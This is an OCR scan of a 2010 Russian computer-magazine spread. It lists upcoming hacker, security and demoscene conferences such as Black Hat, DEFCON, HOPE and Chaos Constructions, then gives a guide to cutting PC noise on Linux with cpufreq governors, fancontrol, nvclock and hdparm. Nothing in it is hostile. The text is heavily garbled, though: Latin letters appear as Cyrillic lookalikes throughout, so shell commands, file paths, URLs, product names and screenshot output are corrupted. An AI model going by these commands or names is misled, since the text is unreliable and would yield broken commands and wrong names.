«ОМС! Конец света уже наступил!!!». Как ни 
странно, за такой внешней несерьезностью 
действительно скрывается вполне адекватный 
кон, который развивается и растет год от года. 

САМ5ЕШЕ5Т 

КОГДА: 20 -26 МАРТА 
ГДЕ; Ванкувер, Канада 
САЙТ: сапзетезісот 

Думаешь, прошедшие Олимпийские игры 
были единственным интересным событи- 
ем в канадском Ванкувере? Тогда спешим 
сообщить, что в конце марта бывшую столицу 



Олимпиады ждет и другое заметное событие, 
на этот раз из области высокихтехнологий — 
ежегодный кон СапЭесѴѴезІ:. Это мероприятие 
отличается от описанных ниже хакерских ту- 
совок, так какэто весьма серьезное событие, 
которое посещают не менее серьезные лич- 
ности, и поддерживают крупнейшие ІТ-ком- 
пании. Однако конференция посвящается ни 
чему иному, как информационной безопас- 
ности, а значит, она тоже нам интересна. 

В качестве спикеров и ведущих тренингов 
(кстати, платных и довольно дорогих) здесь, 
в основном, предстанут крутые дядьки, 
занимающие высокие должности втоповых 
компаниях. К примеру, среди докладчиков 
уже можно найти имена таких небезызвес- 
тных профи как Маркус Ранам или Чарли 
Миллер. 
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ЗШЕСШѴЗ 

КОГДА: 8-? АПРЕЛЯ 

ГДЕ: Санкт-Петербург, Россия 

САЙТ: [Іеѵеіорегз.зип.гиЛесІі[Іауз201 0 

5ип ТесЬ Бауз врядли можно назвать хакерс- 
кой конференцией, однако это со всех сторон 
интересное и уже «заслуженное» меропри- 
ятие, и было бы странно не внести в наш кален- 
дарь, особенно сучетом того, что хороших 
ивентов натерритории России совсем мало. 
5ип Місгозузіеппз проводит 5Ю по всему 
ми ру уже на протяжении десяти с лишним лет, 
и прошлая конференция в Питере собра- 
ла более трех с половиной тысяч человек. 
Благодаря тому, что конференция бесплатная 
(но предварительная регистрация обязатель- 
на!], практически любой желающий сможет 



послушать доклады ведущих специалистов 
5ип, и посетить актуальные семинары. Среди 
спикеров, кстати, уже заявлен Джеймс Гослинг 
— легендарный автор языка программирова- 
ния Заѵа, имена остальных докладчиков пока 
держатся втайне. 

НАСКШТНЕВОХ 

КОГДА: 19 -22 АПРЕЛЯ; 29 ИЮНЯ - 
2 ИЮЛЯ 

ГДЕ.: Дубай, ОАЗ; Амстердам, Нидерланды 
САЙТ: ѵѵѵуѵу.НаскіпІІіеЬох.огд 

Наск іп Тбе Вох — первая довольно серьезная 
конфа, с приличным «послужным списком» 
в нашем календаре. НІТВ существует с 2003 
года и уже много лет проходит в два этапа: 
первый — весной в Дубае, второй — осенью 



в Малайзии. По сути, это крупнейшая конфа 
в области информационной безопасности в 
странах Азии, о ней пишут ведущие компью- 
терныеСМИ, и на неене брезгуют приезжать 
настоящие звезды ІТ-сцены и андерграунда 
со всего мира. Но в этом году в привычном 
распорядке кона случится одно интересное 
изменение — помимо двух упомянутых выше 
этапов, впервые состоится и европейская 
НІТВ, провести которую решили в Амстерда- 
ме, в середине лета. К сожалению, подроб- 
ностей об этом ивенте пока нет, а официаль- 
ный сайт сообщает, что конкретики стоит 
начинать ждать не раньше апреля. 

Что до традиционного НІТВ БиЬаі.то здесь 
все без изменений — конференция состоит- 
ся, и на ней, как всегда, будет много интерес- 
ного. Среди спикеров уже заявлены такие 
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ВЫСТУПЛЕНИЕ АДАМА 
СЭВЕЙДЖАНАНОРЕ. 



фигуры, как Джон Виега — экс вице-прези- 
дент, а ныне один из технических директоров 
компании МсАІее; Лоран О до — основатель 
ТЕНТВІ-ЭесигіТу и известный спец в области 
И Б; и Марк Шенефельд — независимый 
профессионал в области сетевой безопас- 
ности. Также не обойдется и без конкурсов, 
семинаров и иже сними. 

ВІ.АСКНАТЕІШОРЕ 

КОГДА: 12 -15 АПРЕЛЯ 
ГДЕ.: Барселона, Испания 
САЙТ: ѵѵѵуѵу.ЫаскІіаІсот 

Если ты никогда не слышал о конференции 
ВІаскНаЕто, наверное, ты читаешь этот журнал 
впервые и врядли вообще не интересуешься 
компами и всем, что сними связанно. 

ВІаскНаТ — одно из самых значимых и массо- 
выххакерских мероприятий на планете — на 
него съезжаются тысячи экспертов и профес- 
сионалов со всего мира. Конфе в этом году 
исполнится уже ІЗлет. Какобычно, первым в 
череде «черношапочных» мероприятий прой- 
дет В ІаскНаІ Ей горе. 

На европейской части конференции 
будут говорить о самых разных вещах, и 
темы обещают быть горячими, вот только 
некоторые из них: 5АР бэкдоры, слабые 
места АбоЬе Біазб, проблемы РОЕ вооб- 
ще и АбоЬе Реабег в частности, также 
обещают обнародовать новые дырки в 
популярных архивных форматах, таких 
как2ІР, 721 Р, РАР, САВ. Среди спикеров 
конференции заявлены: широко известный 
эксперт Мокси Марлинпайк, ХайфейЛи из 
ЕогЛпеІ: I п с. , Жанна Рутковска из ІпѵізіЫе 
ТЫпдз Баб, Кристиан Папатанассиу из 
ТгизГѵѵаѵе Брісіегіабз, Пол Стоун из СопТехТ 
ІпіюгтаЛоп ЭесигЛу и многие другие. 
Обещает быть очень насыщенной и програм- 
ма тренингов: для новичков проведут ряд 



базовых семинаров, рассказывающих о том, 
какдумают, действуют и с чем работа ют хакеры. 
Публике также обещают рассказать о том, как 
писать эксплойты, как искать уязвимости и 
баги, и как научиться ломать нетолько код, но и 
железки. Продвинутым посетителям, разуме- 
ется, скучать тоже не позволят — для них на 
ВІаскНаГ состоится более десятка тренингов, 
в ходе которых речь пойдет о уязвимых местах 
веб-приложений, подвергнется жестокой атаке 
протокол ІЕЕЕ 802.1 1 , и будут по винтику разо- 
браны ТСР/ІР сети. 

ШАШ 

КОГДА: 15 -18 АПРЕЛЯ 
ГДЕ.: Кливленд, США 
САЙТ: ѵшѵѵ.поіасоп.огд 

ІЧоТасоп являет собой довольно необычное 
мероприятие, особенно на фоне остальных 
конференций, приведенных в нашем списке. 
Дело втом, что этот ивент, основанный в 2003 
году, создали своеобразные эстеты отхакер- 
ского сообщества — люди, которых больше 
волнует не механика взломов и не политика, 
а образ мышления хакеров и пересечения 
хакинга с разного рода искусством. Сами 
организаторы утверждают, что они не стре- 
мятся стать «очередной хакерской тусовкой», 
и, тем более, не хотят никого перещеголять 
и подвинуть; их цель, напротив, состоит в 
том, чтобы раскрыть и осветить те грани 
хакерства, которые на большинстве конов 
попросту игнорируются. Таким образом, на 
ІЧоГасоп умудряются одновременно говорить 
и о различных аспектах информационной 
безопасности, и, скажем, о музыке. Самое 
интересное, пожалуй, в том, что столь не- 
обычный стиль совершенно не мешает конфе 
год о года собирать приличную аудиторию и 
докладчиков прекрасного уровня. 



ВІ.АСКНАША 

КОГДА: 24-29 ИЮЛЯ 
ГДЕ.: Лас-Вегас, США 
САЙТ: уѵѵѵѵу.ЫаскІіаІсот 



Американская версия ВІаскНаГ традиционно 
состоится в середине лета, и пройдет она в ми- 
ровой столице казино - Лас-Вегасе. Сложно ска- 
зать, которая из конференций интереснее или 
лучше — европейская или американская, дело 
втом, что они скорее дополняютдруг друга, а не 
соперничают. На обоих мероприятиях мелькают 
одни и те же лица, всегда выступают известней- 
шие представители ІТ-сцены, и поднимаются 
самые насущные и острыетемы. Нет сомнений в 
том, что ВІаскНаГ 201 0 не станет исключением, и 
хотя списки докладчиков, программа семинаров 
и другие подробности пока не опубликованы, с 
уверенностью можно сказать, что ВІаскНаі: не 
подкачает и даст всему миру пищу для размыш- 
лений на весь остаток 201 0 года. 



НАСКЕРЗ ОМ РЦШЕТ 
ЕАКТН (НОРЕ) 

КОГДА: 16 -18 ИЮЛЯ 
ГДЕ.: Нью-Йорк, США 
САЙТ: ШепехІІіоре.огд 

Эту кон фу в 1994 году создал и с тех пор под- 
держиваетлегендарный журнал «2600: ТЬе 
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КАЖДЫЙ год на ОЕРСОИ ПОСЕТИ- 
ТЕЛЯМ, ПРЕССЕ, СПИКЕРАМ И Т.Д. 
ВЫДАЮТ КРАЙНЕ ЗАБАВНЫЕ БЕИДЖИ 
НІІМАЫ - ЭТО ПРОСТОЙ ПОСЕТИТЕЛЬ. 
ПОЧТИ «РАЙОН №9» ПОЛУЧАЕТСЯ. 



БЫТЬ МНОГО! 



Наскег Оиагіегіу», а это само по себе является 
своеобразным знаком качества. 

НОРЕ проводится не ежегодно — сначала хаке- 
ры устраивали себе многотысячные праздники 
раз в три года, но с наступлением миллениума 
немного уплотнили график и теперь прово- 
дят конференцию раз в два года. Интересно, 
что каждый раз конфа носит разные имена: 
НОРЕ: Наскегз Оп Ріапеі ЕагТЬ, ВеуопсІ НОРЕ, 
Н2К, Н2К2, ТЬе ЕіШі НОРЕ, НОРЕ ІЧитЬег 
Зіх, и наконец в 2008 году собрание получило 
немного пугающее названиеТЬе Баз) НОРЕ. 
Однако последней «Надежда’08» не стала — 
мероприятие года 2010-го гордо именуется ТЬе 
Ыехі НОРЕ, навевая смутные ассоциации со 
«Звездными войнами». 

В прошлые годы конференция запомнилась 
выступлениями и докладами таких монстров 
какСтивен Возняк, Кевин Митник, Ричард 
Столлман и, сюрприз-сюрприз — Адам Сэ- 
вейдж («Разрушители мифов»]. Не обходилось 
также и без появлений чуваков из известней- 
шиххак-групп, вроде СиІТоННе Беаб Соѵѵ. 
Однако, что готовит нам год грядущий, остается 
только гадать — конференция до сих пор нахо- 
дится в стадии разработки, и ее официальный 
сайт перманентно валяется. Будем надеяться, 
что эти «технические неполадки» не помеша- 
ют ивенту пройти по высшему классу, какэто 
всегда и бывало. 

АЗЗЕМВЬУ 

КОГДА: ДАТА ЕЩЕ НЕ ОПРЕДЕЛЕНА 
ГДЕ: Хельсинки (предположительно), 
Финляндия 

САЙТ: ѵѵтаззетЫу.огд 

Вот мы и добрались до первой демопати в 
нашем календаре. АззетЫу одно из старейших 
демо-мероприятий на нашем голубом шарике 
— его история началась аж в 1 992 году. Кроме 
того, АззетЫу является еще и крупнейшей (са- 



мой многочисленной] демо-тусовкой — год от 
года это событье привлекает более 5000 чело- 
век. Проходит культовый слетдемомейкеров в 
Финляндии, что тоже немаловажно для нашего 
российского брата - в Финляндию добраться не 
в пример проще и дешевле, чем вте же Штаты, 
или даже в Европу. 

В 2007 году АззетЫу разделили на две 
части: сначала проводится АззетЫу ѴѴіпТег, 
которая, как не трудно догадаться, имеет 
место зимой (обычно в ян варе -фев рале); а 
за ней следует АззетЫу Зит тег — Капитан 
Очевидность подсказывает, что эта часть 
проходит летом. Основной и главной по-пре- 
жнему остается летняя часть, так какзимняя 
имеетскорее геймерскую направленность. 
«Игровая» Аззетіу ѴѴіпГег’І 0, какты пони- 
маешь, уже позади, но с объявлением даты 
летней, основной части демопати организа- 
торы отчего-то затягивают. АзетЫу Зиттег 
бесспорно состоится, но никакой конкретики 
нам пока не сообщать не хотят. В ответ на 
это можно лишь развести руками, и посове- 
товать всем, кто интересуется демосценой, 
почаще заглядывать на официальный сайт 
мероприятия. 

0ЕГС(Ш 

КОГДА: 30 ИЮЛЯ -1 АВГУСТА 
ГДЕ; Лас-Вегас, США 
САЙТ: шм.беГсоп.огд 

Еще одна конференция-гигант, настоящий 
мастодонт ІТ-сцены. БЕЕСОЫ официально 
считается самым крупным хакерским мероп- 
риятием в США, шутка ли — на него ежегодно 
съезжается почти десять тысяч человек. Ко 
всему прочему, эта конфа еще и одна из самых 
старых — «Дефко ну» в этом году исполнится 18 
лет, и он станет совершеннолетним :). 

На БЕЕСОЫ ежегодно происходит столько 
всего интересного, что объять все это удается 



струдом, и лишнеетому доказательство — 
погонные гигабайты фотографий, видео, и 
текста, появляющиеся в сети после каждой 
конференции. БЕНСОМ 18 обещает пройти 
в лучших традициях: вниманию публики 
предложат многочисленные игры и конкурсы, 
которыхуже сейчасзаявлено более 1 5 — будет 
все, от«захвата флага», до конкурса цифрово- 
го арта и хакерской «Своей игры»; любопыт- 
нейшие выступления профессионалов мира ІТ 
и известнейших представителей андеграунда 
— к сожалению, списки спикеров еще не были 
обнародованы, но можно не волноваться на 
этот счет — скучно не будет, ведь это Б ЕРСО N ! ; 
лекций, докладов, семинаров и тренингов 
также хватит на всех, и темы, как всегда, будут 
подняты самые разные — от написания, де- 
тектирования и обезвреживания всевозмож- 
ного малваря, до развития р2ртехнологий. 
Многочисленные подробности, а также все 
пароли и явки можно узнать на официальном 
сайте ивента. 



СНА05С0МЗШСТІ0М5 

КОГДА: ДАТА НЕ ОПРЕДЕЛЕНА 
ГДЕ: Санкт-Петербург (предположитель- 
но), Россия 
САЙТ: сс.огд.ги 

СЬаоз СопзТгисбопз, или просто СС, это 
наша российская демопати, практически не 
имеющая аналогов в стране ни по количеству 
посетителей, ни по возрасту — СС существуете 
1 995 года. 

Ежегодно в конце августа в культурной столи- 
це, то есть, в Санкт-Петербурге, собирается 
несколько тысяч человек, чтобы показать 
себя, посмотреть на других, а также поучаст- 
вовать в конкурсах и просто хорошо провес- 
ти время. Так как в последние годы СЬаоз 
СопзТгиЫіопз отошел от формата демопати 
и развился до полноценного и разносторон- 
него компьютерного фестиваля, померяться 
силами на нем можно и в хакерских конкурсах 
и фотографии, и кибер-городках, и во многих 
других «дисциплинах» — выбор имеется на 
любой вкус. Также можно и нужно посетить 
обширную выставку старого и\или необычно- 
го железа, оценить старания демомейкеров, 
послушать доклады, спектр которых тоже 
очень широк, и познакомиться с интересными 
людьми. Сбаоз СопзЫиЫюпз, ко всему про- 
чему, мероприятие уже почти легендарное, с 
уникальной, очень уютной и дружественной 
атмосферой. 

Точная дата проведения СС’10 пока не названа, 
но, вероятнее всего, демопати останется верна 
себе, а значит — состоится в конце августа. □□ 



іАъгкек 



БАННЕР КОНФЕРЕНЦИИ НАСКЕРЗ 
ОИРиШЕАРТН. 
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Снижаем программными средствами шум, 
издаваемый компьютером 



Когда речь заходит о снижении уровня шума, издаваемого компом, люди 
обычно начинают рассказывать о низкооборотных кулерах, жестких дис- 
ках на салазках, водных системах охлаждения и прочих вещах, далеких 
от мира софта. Но сегодня мы поговорим о шуме как о проблеме програм- 
много характера, какие настройки и с помощью какихутилит можно про- 



КУЛЕРЫ 

Корпус современного компьютера может на- 
считывать от одного до пяти (или даже восьми] 
вентиляторов, все зависит от фантазии и при- 
хотей его владельца. Обычнотолькотри из них 
подключаются к материнской плате, благодаря 
чему последняя получает возможность контро- 
лировать скорость их вращения. Все остальные 
же «цепляются» напрямую к блоку питания, 
поэтому всегда работают на полной скорости 
(если, конечно, не имеютаналоговых регулято- 
ров вращения на корпусе]. Соответственно, для 
получения бесшумного компа нам необходимо: 

• Избавить корпус от многочисленных вентиля- 
торов. Поверь, если втвоем компе неустановле- 
но 4 жестких диска и 2 видеокарты, смысла в них 
просто нет, а в большинстве стандартных систем 
хватит и кулеров на процессоре и блоке питания. 

• Снизить производительность процессора, что 
приведет к снижен ию внутренней температуры 
корпуса и скорости вращения его охлаждающих 
вентиляторов (вентилятора процессора). 



• Самостоятельно снизить число оборотов 
вентиляторов и рискнуть жизнью процессора и 
других компонентов компа. 

С отверткой ты уже должен быть знаком, поэтому 
первый пункт мы пропустим и остановимся на 
последнихдвух подробнее. 

Традиционно для управления частотой 
процессора в Ыпих применялись файлы 
каталогов /ргос и /вуз. Записав о предел ен- 
ноезначение в один из них, можно было 
перевести процессор в энергосберегаю- 
щий режим, в результате чего материнская 
плата сама понижала количество оборотов 
кулера. Этот подход работает и сейчас, 
например: 

$ саб /зуз/беѵісез/зузДет/сри/сриО/ 

сриДгед/зса1іпд_доѵегпог 

С помощью такой команды можно узнать о 
текущем регуляторе энергосбережения, а с 
помощью следующей — изменить его: 



# есДю сопзегѵаДіѵе > /зуз/сіеѵісез/ 

зузДет/сри/сриО/сриДгед/зса1іпд_ 

доѵегпог 

Всего каталог сриітец насчитывает 1 1 
файлов, изменяя содержимое которых, ты 
сможешь очень гибко управлять частотой 
процессора. Их перечень и описания приве- 
дены в следующей таблице: 

$ 1з -1 /зуз/беѵісез/зузДет/сри/ 
сриО/сриДгед 

аДДесДеб_сриз — список процессоров, 
частота которых будет изменена 
сриіпДо_сиг_Дгед — текущая частота 
процессора в кГц 

сриіпДо_тах_Дгед — максимально воз- 
можная частота процессора 
сриіпДо_тіп_Дгед — минимально воз- 
можная частота процессора 
зса1іпд_аѵаі1аЫе_Дгедиепсіез — спи- 
сок допустимых частот процессора 



► 080 
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» сри1тед-ігѵ?о 

сри?геди*іІ5 0Ѳ5: ери^гед-ігѵРп [С) Оопоіпік Вгогіоизкі 2004-2006 
ИерогЪ еггогг апсі Ьидз ±о сриітея^ѵдег кетеі.огд, ріеазе. 
апаіугіпд СРУ 0: 
сігіѵег: п^огсе2 




После установки запусти команду сриітед-іпію, 
которая выведет всю информацию отекущих 
настройках: драйвер, регуляторы, диапазон 
частот и т.д. Для изменения регулятора исполь- 



СРУз ѵ4іісИ пее^ ѣо зні^сГі "Ргедиепсу 1;Ье вате ’Ъіте : Ѳ 
ЬагеЫаге ІітИз: 1.29 СНг - 1.84 бНг 

аѵаІІаЫе сри^геч доѵегпогз: сопзегѵа’Ьіѵе , откгоапсЬ и5ѳг5расе г роиегзаѵе, рег'Рогтапсе 
сиггеп* роіісу: Ігериепсу гНоиІсІ Ье ні*Ніп 1.29 СН 2 апсі 1.84 СНг. 

ІЪе доѵегпог ' 1 регТоппапсв м та у сіесісіе мЬісН зреегі Іо изе 
ѴііѣИіп "ЬЫз гапде . 
сиггѳпѣ СРУ ’Ргедиепсу ів 1.84 СНж. 



зуй следующую команду: 

$ зисіо сриІгед-зеС -д ромегзаѵе 



Частота меняется с помощью флага '-Г: 



$ зисіо сриІгед-зеС -1 1.22 СН 2 



Команда сриігед-іпіо покажеттекущие настройки производительности 
процессора 



зса1іпд_аѵаі1аЫе_доѵегпогз — спи- 
сок допустимых регуляторов 
зса1іпд_сігіѵег — используемый драй- 
вер управления частотой 
зса1іпд_доѵегпог — используемый 
регулятор 

зса1іпд_шах_1гед — максимальная 
частота процессора, допустимая для 
установки регулятором 
зса1іпд_шіп_1гед — минимальная 
частота процессора, допустимая для 
установки регулятором 
зса1іпд_зеСзреесі — предназначен для 
изменения частоты процессора 

Естьдва ключевых момента, относящихся 
к изменениютактовой частоты процессора 
в Ріпих, которые следует запомнить раз и 
навсегда: 

1. Технологииуправления частотами и энерго- 
сбережением улучшаются с выходом каждой 
новой модели процессора, независимо отего 
марки. Поэтому почти каждая модель процес- 
сора имеет собственный драйвер, который 
необходимо загрузить в память для того, чтобы 
получить возможность изменять файлы катало- 
га сриітец. Вотсписок наиболее используемых 
модулей: 

• асрі-сриітед — изменение состояния процес- 
сора средствами АСРІ (Р-Зіаіез Огіѵег] 

• р4-сІосктосі — Репбит 4 

• зреесізіер-сепігіпо — Репбит М 

• зреесізІер-ісН — Репбит ІІІ-М, Р4-М, ІСН2/ 
ІСНЗ/ІСН4 

• зреесізіер-зті — Репбит ІІІ-М, 440 ВХ/2Х/МХ 

• роѵѵегпоѵѵ-кб — АМ Ц Кб 

• роѵѵегпоѵѵ-к7 — АМЦ АОзІоп 

• роѵѵегпоѵѵ-к8 — АМЦ Оріегоп, АіЫоп 64, 
АіЫоп64Х2, Тигіоп 64 

• срігігед-пк>гсе2 — изменение частоты средс- 
твами чипсета пѴібіа пРогсе2 (изменение Р5В 
независимо от частоты РСІ/А6Р) 

Во многих дистрибутивах все эти модули встро- 
ены в ядро, поэтому подбирать подходящего 
кандидата вручную не придется. 

2. Для автоматического управления частотой 
используются регуляторы — программные 
алгоритмы, которые изменяют производитель- 
ность процессора в зависимости от каких-либо 
условий. Последние ядра Ріпих предоставляют 
пять различных регуляторов на все случаи 

ЖИЗНИ: 



1. регіогтапсе — регулятор, используемый по 
умолчанию, заставляет работать процессор с 
максимальной скоростью. 

2. опсіетапсі — изменяеттактовую частоту про- 
цессора в зависимости от нагрузки на систему. 

3. сопзегѵаііѵе — аналогопбетапб, отли- 
чающийся плавным изменением частоты 
процессора (актуально для ноутбуков, так как 
позволяетсберечь ресурсы батареи]. 

4. роѵѵегзаѵе — всегда выставляет минималь- 
ную частоту. 

5. изегзрасе — не делаетничего, позволяя 
пользователю самостоятельно выставить 
частоту. 

В некоторых дистрибутивах регуляторы 
могут быть вынесены в отдельные модули, 
поэтому перед использованием их придется 
загрузить в память с помощью команды 
вроде: 

# тосІргоЪе сри1гед_опс1етапс1 

Далее регулятор можно активировать путем 
записи его имени в файл зсаІіпд_доѵегпог: 

# есію опсіетапсі > /зуз/сіеѵісез/ 
зузСет/сри/сри0/сри:Егед/зса1іпд_ 
доѵегпог 

В нашем случае полезными могут оказаться 
все четыре последних регулятора. Алгоритм 
опсіетапсі подойдеттогда, когда требуется 
только временное снижение шума венти- 
лятора, например ночью, когда качаются 
торренты, и процессор простаивает. Послед- 
ние два алгоритма будут полезны всем, кто 
хочет постоянной тишины. Причем, в случае 
активирования регулятора изегзрасе, частоту 
придется самостоятельно записать в файл 
5саІіпд_зе1:5реесІ: 

# есйо 1000 > /зуз/сіеѵісез/зузСет/ 
сри/сри0/сри:Егед/зса1іпд_зеЦзрее(і 

Значение следует брать из файла зса1іпд_ 
аѵаіІаЫеДтедиепсіез.' Чтобы неубиватьклави- 
атуру, набирая длинные пути куправляющим 
файлам после каждой перезагрузки, советую ус- 
тановить пакетсриітедибіз, доступный в любом 
дистрибутиве. Втом числе в Цебіап/ІЛэипІи: 

$ зисіо арС-деС іпзСаІІ сриІгедиШІз 



Для измененияустанавливаемого во время 
инициализации системы регулятора укажи 
его имя в строке бОѴЕПІЧОП файла /еіс/іпіі.сі/ 
сриітедибіз (поумолчанию используется 
опсіетапсі]. Все эти действия должны привести 
кснижениютактовой частоты процессора и 
уменышениюуровня шума, издаваемого его 
вентилятором. Однако в некоторых случаях это 
не сработает, и придется использовать специ- 
альные программы для управления скоростью 
вращения кулера. Одна изтаких программ 
носит имя Іапсопігоі и распространяется 
вместе с пакетом Іт-зепзогз. Для того чтобы 
начать ее использовать, нужно установить 
Іт-зепзогз, используя менеджер пакетов, и 
запустить стандартную утилиту конфигуриро- 
вания зепзогз-сіеіеср На вопросы можно смело 
отвечать нажатием <Еп1;ег>. Дойдя до вопроса 
«Цоуои мапШоасИ бэезе Ііпезаиіотабсаііу?», 
напиши уез, скопируй приведенные в вопросе 
имена модулей и скорми их команде тофгоЬе. 
В моем случае команда получиласьтакой: 

$ зисіо шосіргоЬе і2с-п!огсе2 азЫОО 

м831785Сз 

Чтобы проверить работоспособность сенсо- 
ров, выполни команду зепзогз. На экранеты 
должен увидеть массу информации, снятой с 
самых разныхдатчиков. Обрати внимание на 
строки «СРЦ Рап» и «СРЦ Тетр», в нихуказана 
текущая скорость вращения кулера и темпера- 
тура процессора. Наверняка скорость кулера 
будет очень высокой (свыше 4000 оборотов], 
а температура процессора — очень низкой 
(намного ниже 60 градусов]. Все это указывает 
на нерациональное использование венти- 
лятора. Чтобы исправить ситуацию, следует 
задействоватьдемон Іапсопігоі, который 
будет регулировать подаваемое на вентилятор 
напряжение, изменяя его в зависимости отте- 
кущей температуры процессора. Демон требует 
специфичныхдля данной машины настроек, 
поэтому перед его запуском мы воспользуемся 
скриптом рѵѵтсопбд, который сгенерирует 
рабочую конфигурацию. 

Запусти рѵѵтсопбд и нажимай клавишу <Еп1:ег> 
в ответ на любые вопросы. Когда конфигуриро- 
вание будет завершено, и на экране появится 
строка «Беіесі Іап оиіриі Іо сопбдиге, огобэег 
асбоп:», введи в ответ цифру «1» и следуй 
дальнейшим инструкциям. Наиболее важный 
— первый вопрос, скрипт потребует выбрать 
те м п е рату р н ы й датч и к, кото р ы й будет влиять 
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- бепегаі ІпТО *■ 

саг^і пѵіоьа БегогсеРх ээѳохт 

АгсРіііесіиге: ИѴЭ5 А1 

рсі ій: акззг 

СРЦ с ІосЬ: 300,857 тг 

В 051; у ре: АСР 

-- Негіогу ігь^о -- 
АтаипГ : 123 № 

Туреі 256 ЫН ПОЙ 

а«Н: 732.880 №г 

~ АСР іпіо — 

5іаіие: ЕпаЫей 

Ране: ѲХ 

АСР г е*ееі 4Х 8Х 

Рази Игііез: Оіы&іей 

5ѲА: ЕплЫегі 



» зигіо Мрагш - і /6 еѵ/зсІЬ 
/сІеѵ/эгіЬ : 

МосІеІ=ѴЮС $ РмКеѵИП.ОЗВОІ, Бе гіаІКй^ѴЮ -ЖА5Ѵ5409282 

Соп'Рід-і Наг^БесІ: Ио*МБМ Нсі5ы>15и5ес БріпМоігСП Ріхесі 0ТК>5МЬ5 РтІСарВец } 
Даѵ/СН5= 16383/16 /63 , Тгк5І2е=Ѳ, 6ес16І2е=0, ЕССЬу*ез=50 
Ви1 : Л"уре-ипкгіоип г БиР^5іге”16384кВ І МахМииБесЫІб, Ми115есі=16 
Си г0Н5=І6383/16/63 , Си г6есіз=16514064 , ЕВА=у©5, ЕВА5ес1^976773168 
ІОКОѴвоп/оТТ, *РІО~{»піп : 120 ( «/ІОКОѴ : 120} , іОНАЧшіп г 120 , гес : 120} 

РІО тосіез: ріоО ріоЗ ріо4 

ОМА шосіез : шсІіиаО тгітаі шсіітіа2 

КОМА тосіез : исітаО х исітаІ ис1та2 иеІтаЗ исіта4 исІтаЗ исітаб 
Адѵапсее1РМ=по Ѵ/гі1еСасИе=епаЫегі 

Огіѵе сопТогтз Хо: Ііпзресі^іесі : АТА/АТАРІ *і, 2,3, 4,5*6 ,7 

* зідпіРіез іНе сиггепі: асѣіѵе шогіе 

Утилита М ра гт . вся информация о диске из первых рук 



на скорость кулера. Лично я получил пять раз- 
личных вариантов, никакие идентифицируемых 
крометекущего значения, благодаря которому 
иудалосьопределитьправильный вариант. Он 
оказался вторым, скорее всего, в твоем случае 
будеттакже. Далее скрипт попросит выбрать 
диапазоны температур и скоростей, отвечай 
<ЕпІег>, дефолтовыезначения более чем 
разумны. 

После окончания допроса рѵѵтсопіід создаст 
конфигурационный файл, и ты, наконец, смо- 
жешьзапуститьдемон ІапсопІгоЕ 

$ зисіо /еТс/іпіЦ . (Т/ПапсопТгоІ зСагС 

Стоит отметить, что Іапсопігоі подойдет далеко 
не ко всем машинам (в основном это касается 
различных ноутбуков и нетбуков), поэтому 
придется поискать специальную программу для 
своего устройства. Например, для управления 
кулерами на нетбуке Асе г Аз ріге Опе может 
быть использована утилита асегЬсІб [ ѵѵѵѵѵѵ.рііе. 
пеІ/?5есбоп=асегМЯ . Утилита для ноутбука 
5опу Ѵаіо называется Рап Эііепсег [ ѵѵѵѵѵѵ.іа і т і Іа . 
сотЛапзіІепсег.рЬр І. Погуглив, ты наверняка 
сможешь найти подобные утилиты и для своего 
лаптопа. 

ВИДЕОАДАПТЕР 

Итак, с кулерами внутри корпуса вроде разобра- 
лись, теперь надо что-то сделать с вентилятором 
на видеокарте, который иногда оказывается 
даже более шумным, чем все остальные. На 
самом деле здесь все намного проще: хороший 
видеоадаптер сам изменяетскорость вращения 
своего кулера, основываясь на показаниях 
температурного датчика видеочипа, который 
нагревается только во время активной работы 
(то есть игр или использования 30-редактора). 
Большую же часть времени видеочип проста- 
ивает, и его охлаждающий вентилятор должен 
работать на пониженных оборотах. Если же этого 
не происходит — пора обращаться кспециаль- 
ным утилитам. Еслиутебя видеокарта от пѴібіа, 
то для управления ей из Біпих можно восполь- 
зоваться замечательной утилитой пѵсіоск [ ѵѵѵѵѵѵ. 
Ііпихбагбѵѵаге.огд/пѵсіоск ). Она позволяет не 
только изменять рабочие частоты видеочипа 
и памяти, но и производить множество других 



действий, включая регулирование скорости 
вращения вентилятора. 

Для начала запусти утилиту с флагом '-і' и 
посмотри на вывод в секции «— Эепзогіпію — », 
там ты должен увидеть текущую температуру 
графического ядра и скорость вращения кулера 
в процентах. Далее можно просто запустить 
пѵсіоск с флагами '-Г и '-Е', чтобы изменить 
скорость кулера: 

$ зисіо пѵсіоск -1 -Р 60 

Значение должно быть в пределах от 10 до 100 с 
шагом 10. Заметь, что далеко не каждая видюха 
позволиттебе произвести такую операцию. 

ЖЕСТКИЙ ДИСК 

Ну вот, осталосьусмирить накопитель. Кслову 
сказать, современные винты почти не шумят, и 
услышать их даже за низкооборотным кулером 
довольно непросто. Однако, если ты облада- 
тель системы, оснащенной старыми жесткими 
дисками — постоянный треск должен быть тебе 
хорошо знаком и не менее хорошо слышен. 
Какотнего избавиться? Для начала попробуем 
разобраться, что есть этот самый треск. Паря 
над пластинами жесткого диска, головки делают 
очень много перемещений, постоянно меняя 
направление своего движения. В моменты фик- 
сации головки над пластиной или изменения 
ее движения происходит характерный треск, 
издаваемый механикой. Поэтомулучший способ 
заставить диск меньше трещать — сделатьтак, 
чтобы перемещения головки свелись к миниму- 
му. Этого можно добиться тремя способами: 

• Отключить своп, чтобы при нехватке памяти 
ядро не обращалось кжесткому диску, а приме- 
няло другие методы ее очищения. 

• Сделать файловую систему менее фрагмен- 
тированной, тогда при чтении файла головка 
не будет метаться между до рожка ми в поисках 
частей файла. 

• Сделатьтак, чтобы сброс «грязных» буферов 
ФС происходил реже, в этом случае запись на 
диск будет осуществляться «рывками», с боль- 
шими промежутками между операциями записи. 
Первый способ радикален, но при достаточ- 
ном количестве оперативной памяти вполне 
оправдан. Чтобы сделать диск менее шумным 



-- 50ПВОГ іпГо -- 
белеог: (пиіі) 

— Ѵісіёовіез іпУогтаііог> — 

Ѵегэіоп: 84,35.28,32 

3-ідпоп тезэаде: СеРогсѳ РХ 59ѲОХТ ВЮ5 

РегТогталее 0: дри ЗФѲМІ^г/ииіогу 7О0МИг/ 1 „ 20Ѵ/ 15Ѵ 

рФгГйгтвлсе Хеѵеі 1: дри 375НН&/я«*огу 700га*г/ПЗѲѴ/і8% 

РегТогтепса Іегеі 2: дай Э9ѲГ№та*огу 700Жг/1.4ѲѴ/26% 

ѴЮ іазк: 3 

Ѵоиэде Іеѵеі Ѳ? 1.20Ѵ, ѴШ: 1 
ѴОХіэдв Іеѵеі 1: 1.38Ѵ, ѴІО: 2 
Ѵоінаде Іеѵеі 2: 1.40Ѵ, ѴШ: 3 

